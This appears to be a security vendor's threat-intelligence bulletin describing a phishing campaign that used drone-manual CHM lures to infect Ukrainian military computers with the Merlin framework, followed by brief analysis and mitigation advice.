Security Intelligence
Loading table of contents...
Security researchers have uncovered a new phishing campaign against the Ukrainian military that leverages Microsoft Compiled HTML (CHM) files designed to appear like an operating manual for drones. Once opened, the CHM file runs malicious JavaScript and PowerShell code to ultimately download Merlin, a publicly available post-exploitation malware framework capable of remote code execution.
In August 2023, the Ukrainian Computer Emergency Response Centre (CERT-UA) advised that it had observed a similar attack that used CHM files as decoys to infect the computers with the open-source tool.
In this campaign, the threat actor sent the phishing emails from an address designed to appear as though it belonged to CERT-UA and used the subject line “CERT-UA recommendations on MS Office program settings.” CERT-UA attributed the campaign to a group it tracks as UAC-0154.
Source: The Hacker News
Analysis
It’s unclear if the use of drone manual lures is intended specifically to target Ukrainian military personnel engaged in drone warfare, or if the threat actor simply assumed drone manuals would be interesting enough to elicit a response from the recipient regardless of what unit they are in.
Ukraine has been extremely effective in using drones to target Russian equipment and personnel. It would be highly likely that the cyber wings of the Russian Military Intelligence Directorate (GRU) would be very motivated to obtain sensitive information on Ukraine’s drone program and its operators.
Mitigation
Field Effect recommends that governments and organizations in Ukraine, and those in support of Ukraine, adopt a heightened security posture towards cybersecurity given the threat posed by Russian state-sponsored cyber actors. We encourage all organizations to review the U.S. Cybersecurity & Infrastructure Security Agency (CISA) ShieldsUp program, which provides robust guidance for preparing, responding to, and mitigating the impacts of Russian state-sponsored cyberattacks.
Field Effect’s elite team of Security Intelligence professionals constantly monitors the cyber threat landscape for novel TTPs and IoCs. This research contributes to the timely deployment of signatures into Covalence to detect and mitigate threat activity.
